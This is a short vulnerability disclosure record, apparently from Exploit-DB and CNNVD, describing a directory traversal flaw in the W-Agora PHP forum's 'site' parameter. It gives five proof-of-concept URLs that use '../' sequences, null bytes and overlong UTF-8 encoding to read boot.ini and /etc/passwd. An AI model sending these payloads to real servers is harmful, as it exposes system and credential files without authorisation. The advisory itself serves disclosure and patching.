https://www.exploit-db.com/exploits/26169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-245

W-Agora是一套免费且开源的PHP论坛程序。W-Agora在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞遍历服务器目录访问任意文件。W-Agora的脚本在处理没有充分检查site参数，远程攻击者可以在输入数据中插入类似的”../”目录遍历串访问Web主目录以外的任意文件。

source: http://www.securityfocus.com/bid/14597/info

W-Agora is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter. Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. 

http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd
http://www.example.com/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini

来源:BID
名称:14597
链接:http://www.securityfocus.com/bid/14597
来源:BUGTRAQ
名称:20050818w-agora4.2.0andpriorRemoteDirectoryTravelVulnerability
链接:http://www.securityfocus.com/archive/1/408522
来源:SECUNIA
名称:16497
链接:http://secunia.com/advisories/16497
来源:MISC
链接:http://h4cky0u.org/viewtopic.php?t=2097
来源:FULLDISC
名称:20050818w-agora4.2.0andpriorRemoteDirectoryTravelVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0599.html
来源:XF
名称:wagora-index-directory-traversal(21906)
链接:http://xforce.iss.net/xforce/xfdb/21906
来源:SECTRACK
名称:1014737
链接:http://securitytracker.com/id?1014737